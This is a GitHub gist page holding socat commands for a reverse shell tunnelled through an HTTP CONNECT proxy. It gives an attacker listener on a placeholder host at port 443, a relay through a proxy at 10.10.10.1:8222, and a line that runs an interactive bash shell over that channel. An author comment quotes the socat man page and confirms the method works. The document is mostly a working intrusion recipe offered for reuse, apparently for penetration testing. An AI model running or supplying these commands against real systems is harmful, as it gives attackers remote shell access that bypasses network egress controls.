Skip to content

Instantly share code, notes, and snippets.

@staaldraad
Last active January 12, 2024 12:24
  • Star 16 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save staaldraad/a3cb590e6ec48c25c55af84eec03b97d to your computer and use it in GitHub Desktop.
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
@staaldraad
Copy link
Author

staaldraad commented Aug 31, 2018

The proxy server must allow CONNECT proxying

socat man-page entry:

PROXY:::
Connects to an HTTP proxy server on port 8080 using TCP/IP version 4 or 6 depending on address specification, name resolution, or option pf, and sends a CON‐
NECT request for hostname:port. If the proxy grants access and succeeds to connect to the target, data transfer between socat and the target can start. Note
that the traffic need not be HTTP but can be an arbitrary protocol.
Option groups: FD,SOCKET,IP4,IP6,TCP,HTTP,RETRY
Useful options: proxyport, ignorecr, proxyauth, resolve, crnl, bind, connect-timeout, mss, sourceport, retry
See also: SOCKS, TCP

Could probably do this in a one-liner but I was failing. The two part-er worked a charm 🎉

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment